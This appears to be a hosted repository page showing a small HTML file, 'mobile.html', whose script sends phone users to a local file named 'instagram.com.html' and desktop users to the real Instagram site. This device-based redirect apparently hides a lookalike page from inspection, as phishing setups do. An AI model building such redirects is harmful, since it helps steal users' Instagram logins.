dfhfhfgg's picture
Create mobile.html
1170839 verified
raw
history blame contribute delete
366 Bytes
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<title>3...2...1 GO!</title>
</head>
<body>
<script>
function gopc() {
if (/Mobi|Android/i.test(navigator.userAgent)) {
window.location.href = './instagram.com.html';
} else {
window.location.href = 'https://www.instagram.com/';
}
}
gopc();
</script>
</body>
</html>